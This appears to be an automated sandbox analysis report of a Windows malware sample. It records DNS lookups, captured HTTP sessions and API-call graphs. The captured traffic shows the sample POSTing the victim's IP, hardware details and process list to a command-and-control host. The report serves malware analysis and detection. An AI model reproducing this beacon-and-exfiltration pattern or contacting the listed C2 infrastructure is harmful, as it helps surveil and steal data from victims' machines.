Dec 26, 2024 14:14:21.574904919 CET | 192.168.2.4 | 1.1.1.1 | 0x21a3 | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false
Dec 26, 2024 14:14:21.575146914 CET | 192.168.2.4 | 1.1.1.1 | 0xac38 | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false
Dec 26, 2024 14:14:26.786135912 CET | 192.168.2.4 | 1.1.1.1 | 0x287b | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false
Dec 26, 2024 14:14:26.786174059 CET | 192.168.2.4 | 1.1.1.1 | 0xb0d3 | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false
Dec 26, 2024 14:14:28.612071991 CET | 192.168.2.4 | 1.1.1.1 | 0x5dc3 | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false
Dec 26, 2024 14:14:28.612154961 CET | 192.168.2.4 | 1.1.1.1 | 0xc86e | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 26, 2024 14:14:17.023552895 CET | 1.1.1.1 | 192.168.2.4 | 0xd9c2 | No error (0) | httpbin.org | | 34.226.108.155 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 14:14:17.023552895 CET | 1.1.1.1 | 192.168.2.4 | 0xd9c2 | No error (0) | httpbin.org | | 3.218.7.103 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 14:14:22.210150003 CET | 1.1.1.1 | 192.168.2.4 | 0x21a3 | No error (0) | home.fiveth5ht.top | | 5.101.3.217 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 14:14:26.923796892 CET | 1.1.1.1 | 192.168.2.4 | 0x287b | No error (0) | home.fiveth5ht.top | | 5.101.3.217 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 14:14:28.749574900 CET | 1.1.1.1 | 192.168.2.4 | 0x5dc3 | No error (0) | home.fiveth5ht.top | | 5.101.3.217 | A (IP address) | IN (0x0001) | false
                                                    • httpbin.org
                                                    • home.fiveth5ht.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 5.101.3.217 | 80 | 2828 | C:\Users\user\Desktop\HrIrtCXI3s.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 14:14:22.332536936 CET | 12360 | OUT | POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                    Host: home.fiveth5ht.top
                                                    Accept: */*
                                                    Content-Type: application/json
                                                    Content-Length: 503853
                                                    Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 30 34 37 34 36 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                                    Data Ascii: { "ip": "8.46.123.189", "current_time": "8532915458317047466", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe" [TRUNCATED]
Dec 26, 2024 14:14:22.452215910 CET | 2472 | OUT | Data Raw: 6e 56 67 37 61 32 6c 46 4f 77 31 5c 2f 75 6e 38 50 35 69 6f 61 74 62 57 59 5a 35 2b 70 5c 2f 2b 75 61 6a 66 37 70 5c 2f 44 2b 59 72 6f 4f 55 68 6f 71 58 61 66 37 78 5c 2f 7a 2b 4e 50 6f 41 69 32 48 32 5c 2f 7a 2b 46 47 77 2b 33 2b 66 77 72 39 67
                                                    Data Ascii: nVg7a2lFOw1\/un8P5ioatbWYZ5+p\/+uajf7p\/D+YroOUhoqXaf7x\/z+NPoAi2H2\/z+FGw+3+fwr9gvEn\/BJ3VfDF4IL740+ZZzOVs9Sh+Gpa1uRyQjZ8ffuLoKCZLWRi67WaNpodkz0rX\/AIJZLc4z8d\/LJ7f8Kw3f+9DXPOPev4PxH7TP6EWEr1MNifGqdCvTdp06nhn4vxkuqavwBaUZL3ozi3GUWpRbi03\/AGvD
Dec 26, 2024 14:14:22.452249050 CET | 4944 | OUT | Data Raw: 31 70 48 36 66 6a 5c 2f 51 30 47 6c 50 72 38 76 31 49 71 4b 4b 6a 6b 37 66 6a 5c 2f 41 45 6f 4e 43 4f 69 69 69 67 36 43 4f 54 74 2b 50 39 4b 6a 71 53 54 74 2b 50 38 41 53 6f 36 41 49 35 4f 33 34 31 48 55 72 39 50 78 5c 2f 77 41 61 69 6f 4f 67 6a
                                                    Data Ascii: 1pH6fj\/Q0GlPr8v1IqKKjk7fj\/AEoNCOiiig6COTt+P9KjqSTt+P8ASo6AI5O341HUr9Px\/wAaioOgjk7fj\/SoZe\/+9\/jVqoW6ffz\/AJ\/EfnQaU+vy\/Uq0VYqvWlPr8v1Oin1+X6kL\/eP4fyFNqxVdt5PCflwPyqvf\/u\/iaET9fw\/qaZViq9YnQV6a\/wB0\/h\/MVNJ2\/H+lR0HQV6Klfp+P9DUVRyLz\/r5
Dec 26, 2024 14:14:22.452265024 CET | 2472 | OUT | Data Raw: 63 6e 62 38 61 6b 70 47 42 62 38 38 31 5c 2f 30 54 6e 2b 44 42 42 52 55 75 77 65 5c 2f 2b 66 77 6f 32 44 33 5c 2f 7a 2b 46 41 45 56 66 30 63 5c 2f 77 44 42 43 35 69 50 41 76 37 52 49 48 62 78 5a 38 50 54 2b 65 6a 2b 4b 66 38 41 34 6d 76 35 79 39
                                                    Data Ascii: cnb8akpGBb881\/0Tn+DBBRUuwe\/+fwo2D3\/z+FAEVf0c\/wDBC5iPAv7RIHbxZ8PT+ej+Kf8A4mv5y9g9\/wDP4V\/RX\/wQwfHgr9owfNx4q+HJ4z30jxb6A+lfyp9MrXwTx3\/ZRcP\/APqRVP7X+gLJv6QuXJ2\/5JTif\/1GoH6S+C\/2rfGHxF8GeEviB4N\/Y6\/ab1jwl478MaD4y8K6v\/b\/AOyJp\/8AanhvxP
Dec 26, 2024 14:14:22.452306986 CET | 4944 | OUT | Data Raw: 34 68 2b 45 74 4c 38 53 33 7a 52 70 43 32 71 2b 49 76 42 56 72 38 57 76 41 32 75 61 79 38 55 59 57 47 4a 39 61 31 58 77 78 64 36 74 4a 48 41 6b 64 75 6a 33 68 57 33 69 69 68 43 52 72 2b 42 76 6c 2b 5c 2f 77 43 6e 5c 2f 77 42 65 76 37 51 2b 68 78
                                                    Data Ascii: 4h+EtL8S3zRpC2q+IvBVr8WvA2uay8UYWGJ9a1Xwxd6tJHAkduj3hW3iihCRr+Bvl+\/wCn\/wBev7Q+hxlOO4f4A434ezJr69w\/4r8T5Ji4QnKdKnistyfhnC4qFFyStS+s06042jHmc5TcVKcj\/Oz6eWbYDiDxQ4C4iyyLWB4h8G+FM7w050406tXDZln3F2JwtSsot\/vfqk6EJXlJxUFBScYRI6Kk8v3\/AE\/+vUdf1s
Dec 26, 2024 14:14:22.452449083 CET | 4944 | OUT | Data Raw: 6c 5a 68 6c 66 2b 2b 31 41 4b 67 65 36 74 37 6d 76 35 50 7a 7a 78 4f 34 66 34 73 7a 7a 47 35 70 52 79 68 63 4c 30 4d 56 4f 6e 37 50 4c 36 54 2b 73 34 61 6b 34 55 4b 4e 4b 55 33 58 70 51 70 79 6e 58 78 45 36 63 73 54 69 71 73 73 4e 52 6a 50 45 56
                                                    Data Ascii: lZhlf++1AKge6t7mv5PzzxO4f4szzG5pRyhcL0MVOn7PL6T+s4ak4UKNKU3XpQpynXxE6csTiqssNRjPEVqlR6ykz+38j8JOKOEcgwGV184p8WYnCUpxq5jyfUcRXvWq1YxjhK1SpClRw8KkcPhqMMXWcKFGnCNkoxXyr+0VqHk+F9G05SQ1\/rQnYcfNDY2dwHU55x513bvwM5QcgZB+Otu3jGO\/rX0X+0Zq1nc+IdB0a2v7K
Dec 26, 2024 14:14:22.452503920 CET | 2472 | OUT | Data Raw: 2f 77 42 64 4a 66 31 36 66 35 78 30 70 6e 39 78 4e 73 66 50 58 74 35 50 30 6f 4f 34 68 6b 32 66 49 5c 2f 33 48 7a 5c 2f 7a 31 34 5c 2f 79 4f 33 62 38 4b 5a 38 5c 2f 33 30 54 66 5c 2f 41 4e 4f 5c 2f 34 44 38 7a 5c 2f 54 69 6e 44 37 6b 66 5c 2f 74
                                                    Data Ascii: /wBdJf16f5x0pn9xNsfPXt5P0oO4hk2fI\/3Hz\/z14\/yO3b8KZ8\/30Tf\/ANO\/4D8z\/TinD7kf\/tT\/AI+P8+tNP3nfnfH+68z\/ADk8n6UB7X+9+H\/AINvltv8A+2UUf+f89\/SovLSP9y6f\/q7\/ANB\/hVqST76D5+48yX9xx\/nv\/SoG2eZ86Sv+6Hm\/\/X5OP6GtPZ+f4f8ABOgZJ5P8Cb\/L\/wA+3p\/P0
Dec 26, 2024 14:14:22.452585936 CET | 2472 | OUT | Data Raw: 5c 2f 72 6e 69 73 7a 51 5a 75 38 76 65 34 51 62 5c 2f 4e 48 37 76 5c 2f 6e 74 39 50 35 66 35 35 4e 72 79 66 4f 6e 6d 62 2b 5a 50 39 61 66 33 33 76 61 57 67 70 36 35 56 6b 52 48 33 76 5c 2f 41 4b 33 7a 4a 4a 66 38 38 34 7a 55 52 62 6e 37 2b 79 45
                                                    Data Ascii: \/rniszQZu8ve4Qb\/NH7v\/nt9P5f55NryfOnmb+ZP9af33vaWgp65VkRH3v\/AK3zJJf884zURbn7+yEy\/vf+eGc\/56fl6aez8\/w\/4J0H7u0VieJNes\/DGh6lr+oHFlpdubm4O4LiMOqfeIIHLjnBrtvinpGjfCu4+IlpL8V\/g38Q734NfFvw58EPjTpPw31r4kvrHwn+IXi\/TvFepeFtN8U23xL+E3wxstU0\/XE8
Dec 26, 2024 14:14:22.572017908 CET | 2472 | OUT | Data Raw: 74 74 55 41 30 59 39 31 34 61 68 31 50 78 68 59 2b 41 4e 52 38 4f 66 38 49 39 64 51 5c 2f 45 58 34 6b 5c 2f 45 44 34 5a 36 56 46 66 2b 4a 49 74 44 62 52 4c 76 34 56 5c 2f 44 76 77 6a 38 56 76 69 46 34 79 38 59 36 6e 72 46 6a 5a 65 46 76 43 33 77
                                                    Data Ascii: ttUA0Y914ah1PxhY+ANR8Of8I9dQ\/EX4k\/ED4Z6VFf+JItDbRLv4V\/Dvwj8VviF4y8Y6nrFjZeFvC3w58I+A\/GFp4h17xbqfiOOHSNP0vW7zU7SzsrSG6uvh8hz76PeR8Qcc+JPDWacI5VnXF9XIcr4+4iwFapg6Gc4vhvEcR4PJK2cJezy+pj8LWxef4OecOisVioUlhsbja9LAYKFD7bibgL6TWY5RwX4ZcU8Mca4\/L+
Dec 26, 2024 14:14:22.572069883 CET | 2472 | OUT | Data Raw: 46 72 66 32 6b 5c 2f 34 66 68 6c 38 42 78 39 64 45 2b 49 70 5c 2f 6c 38 53 31 72 38 32 5c 2f 77 42 6f 50 34 34 2b 4b 50 32 6a 76 69 31 34 6d 2b 4d 58 6a 48 54 39 41 30 54 78 4a 34 71 68 30 47 48 55 4e 50 38 41 44 45 47 6f 32 32 68 77 4c 34 65 38
                                                    Data Ascii: Frf2k\/4fhl8Bx9dE+Ip\/l8S1r82\/wBoP44+KP2jvi14m+MXjHT9A0TxJ4qh0GHUNP8ADEGo22hwL4e8PaV4ZsjYwatqWsajH5un6Pay3P2jUrrfePcSxGGF47eL58tvEGjxaV8S9b8ZeKPB3wo0z4M\/E3wL8JPivcfEm58bpN4I8Y+Pk+JQ0+3v9J+Hfw\/+I+vXttpV18K\/E1jrf9l6Te30Fy+ntYWGo2sl5cWPqeveC\
Dec 26, 2024 14:14:22.572089911 CET | 4944 | OUT | Data Raw: 31 5c 2f 41 72 34 76 48 34 50 4c 59 33 50 78 57 38 4e 66 43 54 78 56 34 38 31 72 58 5c 2f 41 2b 6b 58 57 76 32 76 68 4b 39 38 53 6a 55 50 46 48 77 75 38 48 65 41 76 69 4a 34 55 30 48 78 64 71 4f 6c 65 48 64 65 38 54 5c 2f 42 62 78 78 38 55 4e 44
                                                    Data Ascii: 1\/Ar4vH4PLY3PxW8NfCTxV481rX\/A+kXWv2vhK98SjUPFHwu8HeAviJ4U0HxdqOleHde8T\/Bbxx8UNDsJtX0zXPt0vhG7TxFX6XwFn3gL4d5ZLh\/gXOMrynLsyzP8AtStg4Y\/Pczf9oY3Lslg8Xiq+a1cficDSqYCrkkG8RWw2Dpyr4aLUMTiJKp+UeI\/C30l\/FbPKfEPiFw9nee51lmVUMkw2LeV8O5TzZfh80z6eGw
Dec 26, 2024 14:14:26.518847942 CET | 157 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.22.1
                                                    Date: Thu, 26 Dec 2024 13:14:26 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Length: 1
                                                    Connection: close
                                                    Data Raw: 30
                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49732 | 5.101.3.217 | 80 | 2828 | C:\Users\user\Desktop\HrIrtCXI3s.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 14:14:27.045270920 CET | 98 | OUT | GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1
                                                    Host: home.fiveth5ht.top
                                                    Accept: */*
Dec 26, 2024 14:14:28.560333967 CET | 372 | IN | HTTP/1.1 404 NOT FOUND
                                                    Server: nginx/1.22.1
                                                    Date: Thu, 26 Dec 2024 13:14:28 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Length: 207
                                                    Connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                    Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49733 | 5.101.3.217 | 80 | 2828 | C:\Users\user\Desktop\HrIrtCXI3s.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 14:14:28.871701002 CET | 171 | OUT | POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                    Host: home.fiveth5ht.top
                                                    Accept: */*
                                                    Content-Type: application/json
                                                    Content-Length: 31
                                                    Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                    Data Ascii: { "id1": "0", "data": "Done1" }
Dec 26, 2024 14:14:30.490881920 CET | 372 | IN | HTTP/1.1 404 NOT FOUND
                                                    Server: nginx/1.22.1
                                                    Date: Thu, 26 Dec 2024 13:14:30 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Length: 207
                                                    Connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                    Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 34.226.108.155 | 443 | 2828 | C:\Users\user\Desktop\HrIrtCXI3s.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-26 13:14:18 UTC | 52 | OUT | GET /ip HTTP/1.1
                                                    Host: httpbin.org
                                                    Accept: */*
2024-12-26 13:14:19 UTC | 224 | IN | HTTP/1.1 200 OK
                                                    Date: Thu, 26 Dec 2024 13:14:19 GMT
                                                    Content-Type: application/json
                                                    Content-Length: 31
                                                    Connection: close
                                                    Server: gunicorn/19.9.0
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Credentials: true
2024-12-26 13:14:19 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                    Data Ascii: { "origin": "8.46.123.189"}


Target ID: 0
Start time: 08:14:14
Start date: 26/12/2024
Path: C:\Users\user\Desktop\HrIrtCXI3s.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\HrIrtCXI3s.exe"
Imagebase: 0x4d0000
File size: 4'476'416 bytes
MD5 hash: 629763EB39D91BB69848475C90AD1E63
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true


Execution Graph

Execution Coverage: 3.9%
Dynamic/Decrypted Code Coverage: 24.5%
Signature Coverage: 11.1%
Total number of Nodes: 685
Total number of Limit Nodes: 86
                                                      execution_graph 73833 508b50 73834 508b6b 73833->73834 73862 508be6 73833->73862 73835 508bf3 73834->73835 73836 508b8f 73834->73836 73834->73862 73866 50a550 73835->73866 73937 4e6e40 select 73836->73937 73840 508cd9 SleepEx getsockopt 73842 508d18 73840->73842 73841 508e85 73847 508eae 73841->73847 73841->73862 73943 4e2a00 _open 73841->73943 73846 508d43 73842->73846 73848 508cb2 73842->73848 73843 50a150 2 API calls 73854 508dff 73843->73854 73844 508c35 73925 50a150 73844->73925 73845 508c1f connect 73845->73844 73853 50a150 2 API calls 73846->73853 73847->73862 73944 4d78b0 closesocket 73847->73944 73848->73841 73848->73843 73848->73862 73852 508bb5 73852->73862 73939 5150a0 _open 73852->73939 73853->73852 73854->73841 73941 4ed090 _open 73854->73941 73855 508c8b 73857 508dc8 73855->73857 73858 508ba1 73855->73858 73940 50b100 _open 73857->73940 73858->73840 73858->73848 73858->73852 73861 508e67 73942 514fd0 _open 73861->73942 73867 50a575 73866->73867 73869 50a597 73867->73869 73948 4d75e0 73867->73948 73918 50a6d9 73869->73918 73960 50ef30 73869->73960 73871 50a709 73873 4d78b0 2 API calls 73871->73873 73881 50a713 73871->73881 73873->73881 73874 508bfc 73874->73844 73874->73845 73874->73848 73874->73862 73876 50a7e5 73880 50a811 setsockopt 73876->73880 73886 50a87c 73876->73886 73896 50a8ee 73876->73896 73878 50a641 73878->73876 73974 514fd0 _open 73878->73974 73880->73886 73889 50a83b 73880->73889 73881->73874 73973 5150a0 _open 73881->73973 73882 50a69b 73970 4ed090 _open 73882->73970 73884 50a6c9 73971 514f40 _open 73884->73971 73886->73896 73977 50b1e0 _open 73886->73977 73889->73886 73975 4ed090 _open 73889->73975 73890 50af56 73892 50af5d 73890->73892 73890->73918 73892->73881 73895 50a150 2 API calls 73892->73895 73893 50a86d 73976 514fd0 _open 73893->73976 73895->73881 73898 50abb9 73896->73898 73899 50ae32 73896->73899 73900 50acb8 73896->73900 73904 50af33 73896->73904 73896->73918 73920 

                                                      Control-flow Graph for function 4d255d (legend: Executed / Not Executed; graph node data not reproduced)
                                                      APIs
                                                      • GetSystemInfo.KERNELBASE ref: 004D2579
                                                      • GlobalMemoryStatusEx.KERNELBASE ref: 004D25CC
                                                      • GetDriveTypeA.KERNELBASE ref: 004D2647
                                                      • GetDiskFreeSpaceExA.KERNELBASE ref: 004D267E
                                                      • KiUserCallbackDispatcher.NTDLL ref: 004D27E2
                                                      • FindFirstFileW.KERNELBASE ref: 004D28F8
                                                      • FindNextFileW.KERNELBASE ref: 004D291F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                      • String ID: ;%M$@$`
                                                      • API String ID: 3271271169-1184465558
                                                      • Opcode ID: 6db2d274553307b7f6a938f0335c23a2238765f888f0b41b61a059c31da86d62
                                                      • Instruction ID: 3ff606f6a3198642eca3f10a5b37854391ebd6b603ff3279bfd5459927befad1
                                                      • Opcode Fuzzy Hash: 6db2d274553307b7f6a938f0335c23a2238765f888f0b41b61a059c31da86d62
                                                      • Instruction Fuzzy Hash: 12D1A7B4908319DFDB10EF69C58569EBBF0BF84344F00896AE898D7311E7749A88CF52

                                                      Control-flow Graph for function 4d29ff (legend: Executed / Not Executed; graph node data not reproduced)
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                      • String ID: 0
                                                      • API String ID: 2406880114-4108050209
                                                      • Opcode ID: c50865c4918163140ef8aa17fac5ac0729ebcf96d1e654c977f1743709cf660a
                                                      • Instruction ID: 09e0bc92719d4729ed576785a9ec895c5e6996d695489ef4fd015ee1ffd4d41d
                                                      • Opcode Fuzzy Hash: c50865c4918163140ef8aa17fac5ac0729ebcf96d1e654c977f1743709cf660a
                                                      • Instruction Fuzzy Hash: 45E1D9B4909305DFDB50EF68D98569EBBF4EF84304F40886AE898DB350EB749948CF42

Control-flow Graph (rendered graph; blocks marked Executed / Not Executed): function at 004E05B0. Blocks 4e0707-4e0719 and 4e09d0-4e09e6 call WSAEventSelect, block 4e09e8-4e0a03 calls WSAEnumNetworkEvents; internal calls to 4d70b0, 4d70d0, 4d70e0, 4d76a0, 4e03c0, 4e2f10, 4e3000, 4e6df0, 4e6fa0, 4e7350, 4e7380, 4e73b0, 4e7450 and 50dec0.
                                                      APIs
                                                      • WSAEventSelect.WS2_32(?,?,?), ref: 004E0712
                                                      • WSAEventSelect.WS2_32(?,?,00000000), ref: 004E09DD
                                                      • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 004E09FC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
• Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: EventSelect$EnumEventsNetwork
                                                      • String ID: N=M$multi.c
                                                      • API String ID: 2170980988-2986268608
                                                      • Opcode ID: 2f8c38f7d2f39a3908a489191adedf7f7919ec7bf58d893276db4347588c232e
                                                      • Instruction ID: 98af4cf89e71e2d44fed13fecaeae03aafcef8d70b76930e9463f026f2701f2d
                                                      • Opcode Fuzzy Hash: 2f8c38f7d2f39a3908a489191adedf7f7919ec7bf58d893276db4347588c232e
                                                      • Instruction Fuzzy Hash: 4DD1F4716083819FE711CF62C881B6BB7E5FF94349F04482EF89593242E7B8E985CB56

